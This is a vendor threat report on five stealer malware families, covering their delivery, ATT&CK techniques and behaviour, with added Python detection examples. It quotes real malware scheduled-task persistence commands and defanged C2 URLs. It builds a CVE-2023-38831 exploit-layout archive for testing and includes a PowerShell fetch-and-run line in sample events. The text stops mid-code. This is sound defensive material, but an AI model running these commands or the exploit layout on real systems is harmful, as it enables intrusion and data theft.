www.logpoint.com

A Comprehensive Overview on Stealer Malware Families
Emerging Threats Protection Report

Over the years, the Logpoint Security Research Team has dedicated effort to researching emerging threats in the cybersecurity landscape. As we move into 2024, one trend remains a significant threat: stealer malware, also known as info stealers. This class of malware steals sensitive information ranging from browser data to credit cards and cryptocurrency wallets. A contributing factor to its spread is its availability in underground forums and Telegram channels, where it is sold as a monthly subscription for anywhere from $50 to over $300 USD.

In response to this threat, we have created a comprehensive report to help organizations better understand the behavior of stealer malware families. The primary objective of this report is to give readers an overview of stealer malware, insight into its delivery methods, detection and response with Logpoint Converged SIEM, and recommendations for strengthening defenses against these threats.

Foreword

Nischal Khadgi, Logpoint Security Research
Nischal is currently a Security Researcher at Logpoint, where his primary focus is detection engineering, threat hunting, and Emerging Threats research. He is driven by a passion for both offensive and defensive security. Nischal holds a bachelor's degree in cybersecurity, along with certifications as an ethical hacker and Security+.

Table of contents
Foreword and Author
About Logpoint Emerging Threats Protection
Summary
Distribution
Behavior Analysis
Detection through Logpoint Converged SIEM
Investigation and Response using Logpoint Converged SIEM
Recommendation
Conclusion

About Logpoint Emerging Threats Protection

The cybersecurity threat landscape changes continuously, and new risks and threats are discovered all the time. Only some organizations have the resources or the know-how to deal with evolving threats. Emerging Threats Protection is a managed service provided by a Logpoint team of highly skilled security researchers who are experts in threat intelligence and incident response. Our team informs you of the latest threats and provides custom detection rules and tailor-made playbooks to help you investigate and mitigate emerging incidents.

**All new detection rules are available as part of Logpoint's latest release and through the Logpoint Help Center. Customized investigation and response playbooks are available to all Logpoint Emerging Threats Protection customers.
Logpoint Help Center: https://servicedesk.logpoint.com/hc/en-us/articles/115003928409

SUMMARY

2023 has been a cybersecurity rollercoaster, with more sophisticated cyberattacks, data breaches, and evolving threats. As we approach 2024, one trend remains a long-standing threat to the cybersecurity landscape: stealer malware.

Malware, short for "malicious software," refers to any harmful software or code that can steal data and damage or destroy computer systems. The motives behind malware are diverse, including making money off users, stealing sensitive data, or disrupting work. For example, ransomware encrypts an organization's data and demands a ransom in exchange for decryption. Trojans, on the other hand, masquerade as legitimate software to trick users into installing malicious software. Within the trojan category there are loaders and droppers, which attempt to install other types of malware on an infected system. Then there are stealers, which have their own place in this world. The term "stealer" or "info stealer" is self-explanatory: stealers are trojans that collect and retrieve data from infected systems.

Below is a rundown of the threat, the behaviors to expect, and how to detect and proactively defend against potential attacks using Logpoint Converged SIEM capabilities.

How an ETP report is produced (four-phase figure in the original):
- Research for emerging threats such as malware families, threat actors, and vulnerabilities
- Data retrieval, e.g., malware samples, IOCs, and TTPs
- Analysis of the collected data and malware, and tracking of threat actors' activities
- Creation and update of analytics and playbooks
- Writing of the ETP report
- Publishing of the report
- Continuous monitoring for other emerging threats to create the next ETP report

If we reflect on the trend from the previous year, there has been a notable rise in the use of stealer malware. A report from any.run highlights that in 2023, loaders, stealers, and RATs (Remote Access Trojans) were the most commonly uploaded malware types, with counts of 24,136, 18,290, and 17,431, respectively. The table below lists the top 5 malware types from 2023.

Top 5 malware types from 2023 (source: any.run)
Type        Share    Count
Loader      27.30%   24,136
Stealer     20.70%   18,290
RAT         19.70%   17,131
Trojan      17.70%   15,630
Ransomware  14.50%   12,820

When we look at the stealer malware family trend from 2023, Redline Stealer was by far the most widespread malware detected, more than twice as common as the second-most common family, Remcos. One factor contributing to the popularity of stealer malware is its prevalence in underground forums and Telegram channels. These forums operate on the Malware-as-a-Service (MaaS) model, offering threat actors an affordable and straightforward way to execute advanced cyber attacks and achieve their malicious objectives.

Figure: Eternity Market Place (a stealer marketplace listing)

https://any.run/cybersecurity-blog/annual-report-2023/
https://any.run/cybersecurity-blog/malware-trends-2023/

The figure below illustrates the workflow of employing stealer malware. The workflow starts with a threat actor, who may either develop a custom stealer or purchase one from a Stealer-as-a-Service (StaaS, a form of Malware-as-a-Service) provider. Some stealers collect data from compromised systems and leak the collected logs to the dark web, Telegram, Discord, or other cybercrime forums. Threat actors may purchase these logs and use them to gain initial access to the organizations they wish to target.

The impact of stealer malware can be devastating, as evidenced by incidents like the Uber hack in 2022. Following the incident, a follow-up analysis by Singapore-based Group-IB revealed that downloaded artifacts captured in some of the screenshots shared by the threat actor were logs gathered from stealer malware. These logs had been put up for sale on the cybercriminal underground just days before the incident. Group-IB's analysis indicated that at least two Uber employees, from Indonesia and Brazil, had been infected by the Raccoon and Vidar stealers. (Source: Uptycs)

Figure: Selling stealer logs (source: Uptycs)

Stealer workflow (figure in the original):
- Threat actor: develops its own stealer (custom development), or purchases from a StaaS provider either a stealer builder or stealer logs for initial access.
- Stealer as a Service (StaaS) provider: sells the builder, advertised on cybercrime forums with contact details (TOX, Telegram, Jabber), price, proof of work, detection ratio against EDR/AV, and material/README about the builder; and sells the logs containing the credentials of infected users through private channels, Telegram, and cybercrime forums.
- The purchased logs are used for credential harvesting, lateral movement, email spam, internal phishing, and supply chain attacks.

https://twitter.com/GroupIB/status/1570821174736850945
https://www.uptycs.com/hubfs/White-Paper_Stealers.pdf

If we look for such cases, the list is extensive, highlighting the severe impact of stealer malware. While stealer malware may employ diverse tactics, their ultimate objective is to exfiltrate sensitive data from the victim machine. At its core, most stealer malware aims to capture system/host information, cookies, saved credentials, email client data, VPN credentials, browser cache, cryptocurrency wallets, browser history, and saved credit cards.
The graph below depicts the top 5 stealer malware families trending in 2023 and operating as Malware as a Service. Moving forward with the report, we will cover a comprehensive analysis of these stealer malware families observed in 2023: Redline, Remcos, AgentTesla, FormBook, and Vidar, which will serve as reference points for identifying common patterns. We will also explore the different delivery mechanisms threat actors use to get this malware into victim environments.

Top 5 stealer malware families from 2023 (sample counts)
Redline      9,205
Remcos       4,407
AgentTesla   4,215
FormBook     2,098
Vidar        1,569

Mitre ATT&CK Mapping (techniques observed across Redline Stealer, Remcos, AgentTesla, FormBook, and Vidar; per-family coverage of individual techniques is given in the tables of the Distribution and Behavior Analysis sections)

Resource Development
- Acquire Infrastructure: Malvertising (T1583.008)
- Obtain Capabilities: Malware (T1588.001)

Initial Access
- Phishing (T1566)

Execution
- Command and Scripting Interpreter (T1059)
- Exploitation for Client Execution (T1203)
- Scheduled Task/Job (T1053)
- User Execution (T1204)

Persistence
- Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)
- Scheduled Task/Job (T1053)

Privilege Escalation
- Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)
- Process Injection (T1055)
- Scheduled Task/Job (T1053)

Defense Evasion
- Hide Artifacts: Hidden Files and Directories (T1564.001)
- Hide Artifacts: Hidden Window (T1564.003)
- Impair Defenses: Disable or Modify System Firewall (T1562.004)
- Indicator Removal: File Deletion (T1070.004)
- Masquerading: Match Legitimate Name or Location (T1036.005)
- Process Injection (T1055)
- Obfuscated Files or Information (T1027)
- Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)

Credential Access
- Credentials from Password Stores: Credentials from Web Browsers (T1555.003)
- Input Capture: Keylogging (T1056.001)
- Steal Web Session Cookie (T1539)
- Unsecured Credentials: Credentials in Files (T1552.001)

Discovery
- Account Discovery (T1087)
- File and Directory Discovery (T1083)
- Peripheral Device Discovery (T1120)
- Process Discovery (T1057)
- Query Registry (T1012)
- Software Discovery (T1518)
- System Information Discovery (T1082)
- System Location Discovery (T1614)
- System Network Configuration Discovery (T1016)
- System Owner/User Discovery (T1033)
- System Service Discovery (T1007)

Collection
- Archive Collected Data (T1560)
- Clipboard Data (T1115)
- Input Capture: Keylogging (T1056.001)
- Screen Capture (T1113)

Command and Control
- Application Layer Protocol: Web Protocols (T1071.001)
- Non-Application Layer Protocol (T1095)

Exfiltration
- Exfiltration Over Alternative Protocol (T1048)
- Exfiltration Over C2 Channel (T1041)

Distribution

The distribution of stealer malware has been observed through various methods. However, two primary methods stand out: malvertising and phishing. Each represents a distinct approach threat actors use to distribute this malware. We provide a detailed explanation of each method below.

Malvertising

Malvertising, a blend of "malware" and "advertising," is a stealthy technique cybercriminals use to reach targets discreetly. It involves purchasing advertising space on reputable websites and embedding malicious code within seemingly legitimate ads. When these malicious advertisements are clicked, they redirect users to malicious websites or silently install malware on their systems. In recent years, there has been an alarming increase in malvertising incidents, with the shift to Google malvertising (malicious ads placed in search results).
Threat actors have also been observed using SEO poisoning to boost the visibility of their malicious websites, making them appear more genuine to consumers. SEO poisoning exploits the assumption that the top hits are the most credible, and it proves highly effective because people rarely examine their search results carefully.

Case Study I

According to a report from Darktrace, an advertisement appeared on Google when users in the United States searched for the term "Notepad++". Clicking on this advertisement directed victims to the website notepadplusplus[.]site. After selecting their desired software version, victims were presented with a "Download" button. Regardless of the chosen version, clicking "Download" redirected traffic to hxxps://download-notepad-plus-plus.duckdns[.]org/, which initiated the download of a .zip file named "npp.Installer.x64.zip". Following execution, the malware promptly connected to a Telegram channel to acquire its command and control (C2) address.

Acquire Infrastructure: Malvertising (T1583.008): marked as observed for four of the five families (Vidar and Redline are the subjects of the two malvertising case studies; the original table shows four ✓ and one x, but the per-family column alignment did not survive extraction).

Source: Darktrace, https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google

In cases where Telegram was unavailable, the malware attempted to connect to a profile on the Steam video game platform. It then checked in, obtained its configuration file, and downloaded get.zip, an archive containing several DLL libraries. These libraries were used to extract information and saved passwords from various applications and browsers. The in-depth traffic analysis, the examination of the malware's method for obtaining its Command and Control (C2) location, and the analysis of the configuration provide a high-confidence assessment that the malware in question is the info stealer Vidar.
Figure: Vidar config file (source: Darktrace)
https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google

Case Study II

Another example of stealer malware delivered via Google Ads campaigns comes from a Securelist report: fake pages for AMD drivers and Blender 3D software were prominently advertised. A closer look at the URLs revealed that, while they contained software names, they were unrelated to the genuine vendors. Notably, these deceptive domains frequently used common top-level domains (TLDs), increasing their appearance of legitimacy. Users who interacted with these ads were prompted to download a ZIP archive called "blender-3.4.1-windows-x64.zip". Even though the fake download was the same size as the legitimate Blender 3D installer, further investigation revealed discrepancies. After extraction, the archive produced two files: the original Blender 3D MSI installer and a malicious loader.

Figure: Google Ads campaigns (source: Securelist)
https://securelist.com/malvertising-through-search-engines/108996/

The dropped malicious loader appeared larger because it had been padded with junk bytes during creation. Upon execution, the installer used a CMD command to run the malicious loader silently while also running the legitimate Blender 3D installer to conceal its activity. Like a "pre-installer," this technique tricked victims into installing the malware along with the desired software. The loader then executed PowerShell commands to download and execute the payload from a third-party URL. These commands hid the malicious activity using fileless techniques and legitimate .NET Framework tools for execution. The payload, decrypted from a base64-encoded, AES-encrypted binary, revealed itself as the RedLine stealer, which used sophisticated techniques to hide its activities and avoid detection.

Source: Securelist

Phishing

Many stealer malware infections are attributed to spam emails, whether through malicious attachments or links. In one instance, threat actors ran a Redline Stealer campaign disguised as hotel reservation emails; the link in the message points to the URL from which Redline Stealer is downloaded. In another instance, Agent Tesla was distributed through an email masquerading as a price quotation request. The deceptive email, posing as legitimate communication from a South Korean company in the mining and metals industry, includes an attachment. The attached document is an RTF file that exploits the CVE-2018-0802 vulnerability. The RTF document contains an embedded link to an external source; once triggered, this link downloads the Agent Tesla malware to the victim's machine.

Phishing (T1566): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Sources: difesaesicurezza, Bitdefender
https://www.difesaesicurezza.com/en/defence-and-security/cybercrime-new-redline-stealer-campaign-via-hotel-bookings/
https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-warns-of-agent-tesla-phishing-campaign/

Behavior Analysis

Execution (TA0002)

Execution encompasses techniques that enable adversary-controlled code to run on a local or remote system. This critical stage includes executing the malware payload, turning off security controls, and performing other actions needed to achieve the objectives.
Execution: Exploitation for Client Execution (T1203)

Adversaries can exploit specific vulnerabilities to execute arbitrary code and subsequently run malware on targeted systems. Users commonly expect to encounter files related to the applications they use for work, making these applications prime targets for exploitation; Office applications, for instance, are frequently targeted. The table below outlines vulnerabilities frequently exploited by threat actors to execute these stealer malware strains.

Execution: Exploitation for Client Execution (T1203): Redline Stealer ✓, Remcos ✓, AgentTesla ✓, FormBook ✓, Vidar x

Malware          Exploited vulnerabilities
Redline Stealer  CVE-2022-1096, CVE-2021-26411
Remcos           CVE-2017-11882, CVE-2023-38831
AgentTesla       CVE-2017-11882, CVE-2023-38831
FormBook         CVE-2021-40444

CVE-2023-38831 is a high-severity arbitrary code execution vulnerability in WinRAR versions prior to 6.23. It allows attackers to run a malicious script from inside an archive when the victim opens what looks like a legitimate text or image file, such as a '.jpg', '.txt', or 'PDF'. Threat actors have been observed exploiting this vulnerability to deliver the Remcos, Agent Tesla, and FormBook families. In one instance, we observed a CMD file disguised as a PDF file, coexisting with a folder of the same name; the Agent Tesla malware contained within the folder was executed when the file disguised as a PDF was opened.

https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/

According to a report from NSFOCUS, on October 9th it was uncovered that threat actors had targeted the Ukrainian government sector by dropping Remcos through the WinRAR exploit CVE-2023-38831. Disguised as a NATO-themed zip archive, the file contained a benign PDF file and a CMD file used to deliver the Remcos payload.

In November 2017, Microsoft issued an advisory regarding CVE-2017-11882, a vulnerability in the Equation Editor component of Microsoft Office. This high-severity flaw enables attackers to execute arbitrary code in the context of the current user by mishandling objects in memory; successful exploitation leads to remote code execution. When a user downloads and opens a malicious attachment in a vulnerable version of Microsoft Excel, the file initiates communication with the command and control server and downloads additional files without further user interaction. Despite being disclosed in 2017, many organizations continue to use vulnerable versions of Microsoft Office, giving threat actors an opportunity to exploit it. Multiple instances have been observed where stealer malware families such as Agent Tesla and Remcos were distributed by exploiting this vulnerability.

Source: any.run
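The archive layout described above for CVE-2023-38831 can be checked before an attachment is ever opened. The following is an added example, not code from this report or from Logpoint, NSFOCUS or any other vendor cited here: it encodes the public exploit layout (a decoy file whose name ends in a space, next to a directory of the same name that holds a script) and inspects a ZIP for it. The sample archives are constructed in memory for illustration, and every file name in them is hypothetical.

```python
"""Flag ZIP archives laid out for CVE-2023-38831 (WinRAR < 6.23).

Added example, not code from the Logpoint report or from any vendor. It
checks for the public exploit layout: a decoy file whose name ends in a
space ("invoice.pdf ") next to a directory with the same name that holds a
script ("invoice.pdf /invoice.pdf .cmd"). Opening the decoy in a vulnerable
WinRAR runs the script instead. The archives built here are constructed in
memory for illustration, and every file name in them is hypothetical.
Only ZIP containers are handled; the same layout inside RAR is not parsed.
"""
import io
import zipfile

# Extensions that the shell executes rather than opens for viewing.
SCRIPT_EXTENSIONS = {".cmd", ".bat", ".exe", ".vbs", ".js", ".wsf", ".ps1", ".scr", ".lnk"}


def _extension(name: str) -> str:
    base = name.rsplit("/", 1)[-1]
    return "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""


def find_cve_2023_38831_pairs(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (decoy_file, script_entry) pairs matching the exploit layout.

    A pair is reported when a top-level file name ends with a space, a
    same-named directory exists, and that directory holds an entry with a
    script or executable extension.
    """
    hits: list[tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    top_level_files = [n for n in names if "/" not in n]
    for decoy in top_level_files:
        if not decoy.endswith(" "):
            continue
        prefix = decoy + "/"
        for entry in names:
            if entry.startswith(prefix) and _extension(entry) in SCRIPT_EXTENSIONS:
                hits.append((decoy, entry))
    return hits


def build_sample_zip(variant: str) -> bytes:
    """Construct a small archive for the demo (all names are made up)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if variant == "exploit":
            zf.writestr("invoice.pdf ", b"%PDF-1.4 decoy document")
            zf.writestr("invoice.pdf /invoice.pdf .cmd", b"@echo off\r\nstart /b payload.exe\r\n")
        elif variant == "trailing_space_only":  # odd name, but nothing executable inside
            zf.writestr("photo.jpg ", b"\xff\xd8\xff")
            zf.writestr("photo.jpg /photo.jpg ", b"\xff\xd8\xff")
        else:  # plain archive
            zf.writestr("invoice.pdf", b"%PDF-1.4 real document")
            zf.writestr("notes/readme.txt", b"benign")
    return buf.getvalue()


if __name__ == "__main__":
    for variant in ("exploit", "trailing_space_only", "benign"):
        print(variant, find_cve_2023_38831_pairs(build_sample_zip(variant)))
```

The trailing space is the whole trick, so the check keys on it rather than on file extensions alone; a name ending in a space next to a same-named folder has no legitimate reason to exist in a mail attachment. Patching WinRAR to 6.23 or later removes the need for the check, but the layout is still a useful hunting signal in mail-gateway and sandbox logs.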
https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/
https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882
https://app.any.run/tasks/0ee6eac1-82a2-48a9-bd87-cb02ebbefd2c/

CVE-2021-40444 is a remote code execution vulnerability in MSHTML, the engine that powers Internet Explorer. This component is present on modern Windows systems, both client and server, and is used by programs such as MS Word and MS PowerPoint to render web content. Exploiting the vulnerability involves embedding a specially crafted object in a Microsoft Office document with a URL pointing to a malicious script. Upon opening the document, Microsoft Office retrieves the script from the URL and executes it via the MSHTML engine. The script can then use ActiveX controls to perform malicious actions on the victim's computer. In some instances, FormBook has been observed exploiting CVE-2021-40444. The attack chain for this specific campaign is illustrated in the figure below.

CVE-2022-1096 is a type confusion vulnerability in V8, the JavaScript and WebAssembly engine used by Chrome and other Chromium-based browsers, that allows attackers to execute arbitrary code on a vulnerable system. According to a report from CloudSEK, Redline Stealer has been observed exploiting CVE-2022-1096 to target millions of users.

CVE-2021-26411 is a memory corruption vulnerability in Microsoft Internet Explorer; it arises from an error in how the affected software processes maliciously crafted web pages. Exploitation occurs when an attacker deceives a user into visiting such a page, enabling the execution of arbitrary code in the context of the application. According to a report from Bitdefender, the RIG Exploit Kit campaign leveraged this vulnerability to deliver RedLine Stealer.

Figure: FormBook CVE-2021-40444 attack chain (source: Trend Micro). Components shown: email carrying the malicious document; exploit for CVE-2021-40444; contents server at hxxp://0x6B.0254.0113.0244:8090 serving payload.cab; payload.inf; DLL with PowerShell (stage 1); PowerShell stage 2 fetched from hxxp://cdn.discordapp[.]com/[...]/avatar.jpg; .NET injector; FormBook malware.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
https://nvd.nist.gov/vuln/detail/CVE-2022-1096
https://www.cloudsek.com/threatintelligence/redline-stealer-exploits-cve-2022-1096-in-chromium-browsers-to-target-millions-of-users
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26411/
https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/
https://www.trendmicro.com/en_vn/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html

Execution: Command and Scripting Interpreter (T1059)

Windows Command Shell, PowerShell, and Windows Script Host (wscript) are frequently leveraged by adversaries due to their widespread availability and extensive capabilities within Windows environments. This technique is commonly used in conjunction with phishing campaigns, where adversaries try to trick users into opening malicious attachments, resulting in the execution of malicious scripts. In one observed sample of Redline Stealer, the malware, upon execution, runs a command using the Windows Command Shell (cmd.exe) that triggers the execution of a batch file located in the user's Temp directory. Similar behavior has been observed upon execution of Vidar, where the Windows Command Shell is invoked to launch a malicious executable located in the user's Temp directory.
Command and Scripting Interpreter (T1059): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Sources: any.run
https://bazaar.abuse.ch/sample/2d9a9143fcb477dd37249f8d0f10ab0a7c5a509eecd5e69772ff8d319d75fcac/
https://app.any.run/tasks/892c2cb5-c1a9-4b3b-bff0-3afbb6f7f5f7/
https://app.any.run/tasks/a478800f-49b3-440a-bd32-313330f05ccb/

Likewise, similar behavior is observed upon execution of Remcos, which uses the Windows Command Shell to execute a batch file located in the public libraries directory (C:\Users\Public\Libraries\).

Upon execution, AgentTesla commonly employs a multi-stage process. In one instance, a Visual Basic Script (VBS) containing obfuscated code is executed through the Windows Script Host (wscript.exe); a command within this VBS script then invokes PowerShell.

FormBook invokes PowerShell with the execution policy bypassed and no profile loaded (-ExecutionPolicy Bypass -NoProfile) to run a command, usually contained within macros, that downloads malicious content from a specified URL.

Sources: any.run, McAfee
https://app.any.run/tasks/a478800f-49b3-440a-bd32-313330f05ccb/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/

Execution: User Execution (T1204)

Adversaries may depend on specific user actions to achieve execution of malware. Social engineering tactics may be employed to manipulate users into executing malicious code, such as opening a malicious document or clicking a malicious link. These user actions often stem from phishing. They are observed as follow-on behaviors and play a crucial role in deploying and activating stealer malware, allowing adversaries to gather sensitive information from compromised systems.

User Execution (T1204): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Persistence (TA0003)

Persistence ensures an uninterrupted presence on a target system through restarts, credential changes, and other disruptions. By establishing persistence, malware maintains prolonged access, facilitating the accomplishment of its objectives.

In most cases we have observed, stealer malware uses one of two methods to achieve persistence: adding the malware payload to a Registry Run key, or abusing the Windows Task Scheduler service so that the payload is launched again at each login or at a fixed interval.

Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)

Malware may establish persistence by adding a program to the Startup folder or referencing it with a Registry Run key. Adding an entry to the Run keys in the Registry or to the Startup folder ensures that the specified program runs when the user logs in.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): Redline Stealer ✓, Remcos ✓, AgentTesla ✓, FormBook ✓, Vidar x

In almost every instance we have observed, Redline Stealer establishes persistence on the target system by adding the malware payload to the Registry Run keys or by abusing the Windows Task Scheduler. Similar behavior is observed in Agent Tesla, FormBook, and Remcos.

Figure: Redline Stealer persistence (source: Cynet)
Figure: Remcos persistence (source: any.run)
https://www.cynet.com/attack-techniques-hands-on/redline-is-on-track-next-stop-your-credentials/
https://any.run/report/9d8282d54901d4e795f0469a5191242b2e7b3b0c51f810f71c739bfff52de8d5/8cd984a4-a489-4817-a0a2-8600a00f4f76
Persistence: Scheduled Task/Job (T1053)

Malware may use task scheduling functionality to enable the initial or recurring execution of malicious code at predefined intervals. In almost all instances we have observed, stealer malware uses this functionality by abusing the scheduling utilities of the operating system to run programs or scripts at specific dates and times.

In one sample of Redline Stealer, upon execution it drops new files that masquerade as the system process "svchost.exe" and subsequently creates a scheduled task. According to a report from Gridinsoft, RedLine Stealer creates an additional folder within the Temp directory to store the malware-loading script. The malware then creates a scheduled task that runs this script every 3 minutes using the following command:

schtasks.exe /create /tn "Puoi" /tr "C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\binary.exe C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\z" /sc minute /mo 3 /F

Analyzing the report from Quorum Cyber, similar behavior has been observed upon execution of Vidar, which establishes persistence with the following command (no /mo modifier, so the task runs every minute):

"C:\Windows\System32\schtasks.exe" /CREATE /TN "Windows\IntelComputingToolkit\IntelUpdaterTask" /TR "C:\ProgramData\lnteIIxculler\IntelCacheUpdater.exe" /SC MINUTE

During analysis of the Remcos sample, it was found to drop an XML file into the Temp directory. It then creates a new scheduled task named "Updates\filename" and configures it from that XML file.

Scheduled Task/Job (T1053): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Figure: Redline Stealer persistence (source: Triage)
Figure: Remcos scheduled task (source: any.run)
https://gridinsoft.com/spyware/redline
https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf
https://app.any.run/tasks/646bb05d-0ccc-4766-84cb-c0436c85bc75
https://tria.ge/230404-ej3qeaee6w/behavioral1

Figure: Agent Tesla scheduled task (source: any.run)
Figure: FormBook scheduled task (source: Triage)

Likewise, similar persistence behavior has been observed in Agent Tesla and FormBook samples.

Privilege Escalation (TA0004)

Privilege escalation comprises the techniques malware uses to acquire higher-level permissions on a system or network.

Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)

Malware may circumvent User Account Control (UAC) mechanisms to elevate process privileges on a system. Windows UAC permits a program to raise its privileges (tracked as integrity levels ranging from low to high) to execute a task under administrator-level permissions, often by prompting the user for confirmation. In the Remcos sample observed on any.run, the malware sets the registry value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA to 0. This value controls UAC on Windows systems; when it is set to 0, UAC is disabled (the change takes effect at the next reboot).
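To show how the behaviors in the Command and Scripting Interpreter, Registry Run Keys, Scheduled Task and UAC sections above look as detection logic, here is an added example that is not code from this report, from Logpoint, or from any of the cited vendors. It triages Sysmon-style events: field names follow Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set), but the sample events are constructed for illustration and every path, task name, SID and URL in them is hypothetical, except the Vidar schtasks command line, which is the one quoted above. The list of user-writable drop locations is an assumption to tune for your environment, and the UAC check goes beyond the report by also watching ConsentPromptBehaviorAdmin and PromptOnSecureDesktop, two other values that silence UAC prompts.

```python
"""Triage Sysmon-style events for the interpreter chains, persistence and
UAC tampering described in the sections above (T1059, T1053.005,
T1547.001, T1548.002).

Added example, not code from the Logpoint report or any vendor. Field names
follow Sysmon Event ID 1 (process create) and Event ID 13 (registry value
set). SAMPLE_EVENTS is constructed for illustration: every path, task name,
SID and URL in it is hypothetical, except the Vidar schtasks command line,
which is the one quoted in the report. USER_WRITABLE is an assumption.
"""
import re
import shlex

# Drop locations a stealer later runs from (assumption; tune for your estate).
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
# EnableLUA is the value the report describes; the other two also silence UAC prompts.
UAC_POLICY = re.compile(r"\\Policies\\System\\(EnableLUA|ConsentPromptBehaviorAdmin|PromptOnSecureDesktop)$", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
PS_FLAGS = {"-ep", "-executionpolicy", "-nop", "-noprofile", "-w", "-windowstyle", "-enc", "-encodedcommand"}


def _image(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _argv(command_line: str) -> list[str]:
    # Non-POSIX mode keeps backslashes literal and honours "..." quoting.
    return [tok.strip('"') for tok in shlex.split(command_line, posix=False)]


def _schtasks(args: list[str]) -> list[str]:
    low = [a.lower() for a in args]
    if "/create" not in low:
        return []

    def opt(flag: str) -> str:  # value following a /flag, or ""
        i = low.index(flag) if flag in low else -1
        return args[i + 1] if 0 <= i < len(args) - 1 else ""

    run, sched = opt("/tr"), opt("/sc").lower()
    if sched in {"minute", "onlogon", "onstart"} and USER_WRITABLE.search(run):
        return [f"T1053.005 task {opt('/tn')!r} runs {run!r} (/sc {sched} /mo {opt('/mo') or '1'})"]
    return []


def triage(event: dict) -> list[str]:
    """Return ATT&CK-labelled findings for one event (empty list if benign)."""
    findings: list[str] = []
    if event.get("EventID") == 13:
        target, details = event.get("TargetObject", ""), event.get("Details", "")
        if RUN_KEY.search(target) and USER_WRITABLE.search(details):
            findings.append(f"T1547.001 Run key {target!r} -> {details!r}")
        if UAC_POLICY.search(target) and details.strip().upper() in {"0", "DWORD (0X00000000)"}:
            value_name = target.rsplit("\\", 1)[-1]
            findings.append(f"T1548.002 UAC weakened: {value_name} set to 0")
        return findings
    if event.get("EventID") != 1:
        return findings
    image, parent = _image(event.get("Image", "")), _image(event.get("ParentImage", ""))
    args = _argv(event.get("CommandLine", ""))
    low = [a.lower() for a in args]
    if image == "cmd.exe" and any(USER_WRITABLE.search(a) and a.lower().endswith((".bat", ".cmd", ".exe")) for a in args):
        findings.append("T1059.003 cmd.exe launching a script or binary from a user-writable path")
    if image == "powershell.exe":
        if parent in SCRIPT_HOSTS:
            findings.append(f"T1059.005->T1059.001 {parent} spawned powershell.exe")
        flags = sorted(PS_FLAGS & set(low))
        if flags:
            findings.append("T1059.001 powershell.exe with " + " ".join(flags))
    if image == "schtasks.exe":
        findings.extend(_schtasks(args))
    if image == "reg.exe" and "add" in low and any(RUN_KEY.search(a + "\\") for a in args):
        findings.append("T1547.001 reg.exe add to a Run key")
    return findings


SAMPLE_EVENTS = [  # constructed; see the docstring
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\setup.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\loader.bat"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
                    "-Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\setup.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /CREATE /TN "Windows\IntelComputingToolkit\IntelUpdaterTask" '
                    r'/TR "C:\ProgramData\lnteIIxculler\IntelCacheUpdater.exe" /SC MINUTE'},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1-1-1-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\user\AppData\Local\Temp\svchost.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -Command Get-Process"},
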